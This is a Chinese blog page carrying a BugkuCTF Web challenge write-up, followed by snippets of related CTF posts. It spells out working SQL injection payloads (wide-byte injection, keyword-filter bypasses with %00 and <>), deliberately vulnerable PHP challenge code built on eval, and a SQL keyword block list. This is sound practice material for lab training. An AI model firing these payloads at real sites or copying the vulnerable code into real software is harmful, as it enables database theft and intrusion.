BugkuCTF(Web) WriteUp

最新推荐文章于 2025-04-07 11:43:32 发布
最新推荐文章于 2025-04-07 11:43:32 发布
阅读量6.2k 收藏 11
点赞数 3
分类专栏: WriteUp 文章标签: Web BugkuCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/CallMeSa1tyFish/article/details/81392962
版权
本文档详细记录了BugkuCTF中的Web部分挑战,包括文件上传、SQL注入、域名解析、XSS、PHP函数利用等各种技术的实战应用,通过解决各个题目,展示了Web安全的各种攻防技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Web部分

注:Bugku注入题总结见:链接

web2

点开以后发现是满屏的滑稽,按照国际惯例,查看源代码发现flag
这里写图片描述

文件上传测试

用burp抓包修改文件名后缀为.php

计算器

修改最大长度限制
这里写图片描述

web基础$_GET

题目如下

$what=$_GET['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

直接输入?what=flag
这里写图片描述

web基础$_POST

题目如下

$what=$_POST['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

(这里用的火狐浏览器插件HackBar)
这里写图片描述

矛盾

题目代码如下

$num=$_GET['num'];
if(!is_numeric($num))
{
echo $num;
if($num==1)
echo 'flag{**********}';
}

随便输入一个以1开头的字符串
这里写图片描述
也可以利用is_numeric()遇到%00截断的漏洞,构造?num=1%00

Web3

打开页面一直在弹窗,直接查看源代码,在最底端发现可疑编码,转码可得flag
这里写图片描述

sql注入

查看源代码发现是网页编码是gb2312,想到宽字节注入
这里写图片描述
果然输入1%df’ 被转换成了1運
?id=1%bf' and version()>0--+返回正确,则数据库可能为sqlserver和mysql
?id=1%bf' and length(user())>0 --+ 返回正确,说明存在user()函数,是mysql数据库
输入?id=1%df' order by 2 --+ 正常回显
输入?id=1%df' order by 3 --+ 显示Unknown column ‘3’ in ‘order clause’
可得一共有两列
输入?id=1%df' union select database(),2 --+得知数据库名为sql5
这里写图片描述
输入?id=1%df' union select 1,string from sql5.key --+ 可得
这里写图片描述

域名解析

打开linux虚拟机,在终端输入sudo gedit /etc/hosts
添加120.24.86.145 flag.bugku.com
这里写图片描述
保存,直接访问flag.bugku.com

SQL注入1

题目过滤了关键字

//过滤sql
$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit');
foreach ($array as $value)
{
	if (substr_count($id, $value) > 0)
	{
		exit('包含敏感关键字!'.$value);
	}
}

//xss过滤
$id = strip_tags($id);

$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";

可以用%00或者加<>绕过关键词过滤
输入?id=1 uni%00on sel%00ect 1,database() --+ 得数据库名为sql3
或者这样构造:?id=1 un<>ion sel<>ect 1,database() --+
(因为这句$id = strip_tags($id); 会把<>替换为空)

strip_tags() 函数剥去字符串中的 HTML、XML 以及 PHP 的标签。

这里写图片描述
输入?id=1 uni%00on sel%00ect 1,hash fr%00om sql3.key --+ 得到flag

你必须让他停下

用burp抓包后一直foward,会看到带有flag的页面,或者发送到Repeater

本地包含

题目

 <?php
    include "flag.php";
    $a = @$_REQUEST['hello'];
    eval( "var_dump($a);");
    show_source(__FILE__);
?>

file() 函数把整个文件读入一个数组中。

看到eval( "var_dump($a);"); 这句,会输出$a的结构,若是数组将递归展开值,通过缩进显示其结构。
所以可以利用file()函数,把flag.php文件读入数组。
构造:?hello=file('flag.php')

变量1

题目如下

<?php  
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
    $args = $_GET['args&#
最低0.47元/天 解锁文章
CTF---Web---文件包含---10---三种本地包含
qq_22160557的博客
07-29 1086
文章目录前言一、题目描述二、逻辑解析三、解题方法1、将flag.php读入变量hello中2、 eval存在命令执行漏洞,用hello构造payload3、构造伪协议四、总结 前言 题目分类: CTF—Web—文件包含—10—三种本地包含 一、题目描述 题目: 文件包含 二、逻辑解析 <?php include "flag.php"; //可知flag在flag.php里, $a = @$_REQUEST['hello']; //$_REQUEST[]支持get
Bugkuctf web writeup
k0sec的安全路
03-18 459
web2 writeup 访问http://123.206.87.240:8002/web2/ 一堆滑稽。。。 页面没有任何提示,查看一下源代码。点击鼠标右键,发现没有查看源码选项,正常情况下应该有。 猜测flag很可能在源代码中。 按F12: 很显然,flag KEY{Web-2-bugKssNNikls9100} 总结,查看源代码的几种方法: (1)F12 (2)Ctrl+U (3)在u...
CTF-Web(Post)
Zhang_hongchao的博客
01-25 1083
题目:打开网址后显示以下内容: $what=$_POST['what']; echo $what; if($what=='flag') echo 'flag{****}'; 使用POST请求可以直接获取flag。 python代码: payload=dict(what='flag') r=requests.post('http://114.67.246.176:16179',data=payload) print(r.text) 可以直接获取flag为 flagflag{13c5f0c1a1a2.
BugKu--------POST
qq_45616570的博客
06-24 4219
BugKu--------POST 题目 解题思路 代码分析 $what=$_POST['what']; //定义一个变量名为what,以post方式提交 echo $what; //输出这个what变量的值 if($what=='flag') //如果这个变量得到值为flag echo 'flag{****}'; //echo 'flag{****}'; 解题方式 使用hackbar进行post方式进行提交 使用burpsuite进行抓包修改 解题过程 使用hackbar解
CTF--变量1
最新发布
2401_83809941的博客
04-07 310
潜在的安全漏洞:代码注入漏洞——通过eval函数,攻击者可以执行任意PHP代码,如果args=GLOBALS,args等价于$GLOBALS,攻击者可能访问全局变量。风险:eval函数会直接执行用户输入的代码,可能导致代码注入攻击。风险:这会让代码中的错误(如语法错误、未定义变量等)不会显示出来,不利于调试。关键点:这会直接将PHP代码以高亮形式输出到网页上,可能暴露服务器路径信息(如文件路径中的敏感目录)。风险:如果攻击者能访问该文件,可能获取敏感信息。作用:高亮显示当前文件(即这段代码本身)的内容。
flag作为参数以post方式提交_那些与服务器的小动作——台底交易的POST请求
weixin_39805720的博客
11-29 1779
各位小白帽们好又到了新一期的知识点时间了上期我们介绍过HTTP中最简单直白的GET请求把请求参数嵌入到URL的做法当然上期也有提到这种办法隐私性比较差像是密码之类的敏感信息附在URL上就很容易有泄密的风险那么我们今天就要来谈一下相对来说隐私性好一点的POST请求台底交易的GET请求作为两种常用的HTTP请求POST请求对比GET不仅参数藏的更隐秘而且支持的内容种类也更加丰富如图所示是我通...
CTFshow——web入门——php特性(上篇)
h_adam的博客
11-16 4599
web入门——php特性web89web90web91web92 web89 题目 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $fl
BugkuCTF——最新webwriteup(持续更新)
1匹黑马
11-16 4154
文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag:KEY{Web-2-bugKssNNikls9100} 计算器 这里做了输入长度限制,F12选中输入框,修改长度限制即可。 flag:flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET,只要我们传递的参数为what,并且内容为flag,即可输出flag。 flag:flag{bugku_get_su8
BugKu CTF Web WriteUp学习笔记
XQin9T1an的博客
08-06 1195
目录BugKu0x01 web20x02 计算器0x03 web基础$_GET0x04 web基础$_POST0x05 矛盾0x06 web30x07 域名解析0x08 你必须让他停下0x09 本地包含(×)0x0a 变量1 BugKu https://ctf.bugku.com/challenges 0x01 web2 听说聪明的人都能找到答案 题目链接:http://123.206.87.2...
bugkuctf web基础部分 writeup
river
03-20 3012
Bugku-ctf-web 管理员系统 随便输入用户名和密码提示 窗体顶端 窗体底端 IP禁止访问,请联系本地管理员登陆,IP已被记录. 明显需要伪造允许登录的IP 知识点: XFF头(X-Forwarded-For),代表客户端,也就是HTTP的请求端真实的IP。有两种方式可以从HTTP请求中获得请求者的IP地址。一个是从Remote Address中获得,另一个是从X-Forward-For中...
Bugku CTF WEB解题技巧分享与讨论
标题和描述中提到的知识点主要涉及CTF(Capture The Flag,夺旗赛)中的WEB类型题目,以及解题思路和writeup的编写和分享。下面详细说明这些知识点: 1. CTF概念解析 CTF是一种信息安全竞赛,通常分为多种类型,...
bugku 变量1
Seaern的博客
06-27 596
flag In the variable ! <?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ ...
Bugku-CTF (web 持续更新) ——新手ctf记录
xy7850的博客
09-22 2629
目录 1、滑稽 2、计算器 3、GET 4、POST GET和POST的区别: 5、矛盾 6、alert 7、你必须让他停下 1、滑稽 进入场景,发现一堆滑稽表情在飞 直接F12 2、计算器 进入场景,一道数学题,但是只能输入一个数字 F12,可以看到输入框的标签的maxlenth=1 改成2,就可以输入两个数字了,验证就得到了flag 3、GET 进入场景看到php源码,以get请求传入what=flag get,通过拼接url进行传递参
风云杯大学生信安大赛(Web部分题解)
热门推荐
saltor
05-15 1万+
PS:菜鸟一枚,只做出了7题,第8,9题见过类似的但还是不会。。。还是坐等大神们的wp吧。WEB01http://139.129.166.67/4t56ysgh6h7u/ 答案格式:仅输入{ }花括号中的内容 分值 50 本题考查的是正则表达式页面源码:<?php highlight_file('2.php'); $key='KEY{*****************************
关于PHP代码审计的一些题目
Animation77的博客
09-07 1953
题目一: <?php ////phpinfo(); error_reporting(0); show_source(__file__); preg_replace($_GET["a"], $_GET["b"], $_GET["c"]); ?> 解题思路:先看preg_replace函数定义 这里用到了一个小技巧,用到 /e(有些php版本不支持,我这里是可以的), 这...
BugkuCTF WEB前五题题解 莽就完事了
linchuzhu_的博客
06-18 916
第一次写题解多担待! 目录(一)web2(二)计算器(三)web基础$_GET(四)web基础$_POST方法一方法二(五)矛盾 (一)web2 http://123.206.87.240:8002/web2/. 打开网页后是闪瞎眼的表情包,不过不要紧,直接F12查找flag。 完毕。 (二)计算器 http://123.206.87.240:8002/yanzhengma/ 还是老样子,遇题先按F12,没有发现什么特殊的地方。 尝试在输入框中输入答案,发现只能输入一位数字。 接着在开发者工具中发现 出
29、论剑
qwsn
01-20 2698
0x01、题目:论剑 0x02、WP 1、右键链接,点击新建标签页打开链接,保存该附件 如下图所示: 2、又开始了图片的隐写套路: ①、打开图片,感觉宽和高有点问题,颜色也没什么 修改宽高得: ②、在010edit内,修改宽高得同时,搜索了504b 0304无果,搜索ffd8ff得到两张图片,看来是一张图里面隐写了一张,我们保存得到:发现图片一样,实则这两张图的宽和高不同,所以说是两张不同图...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值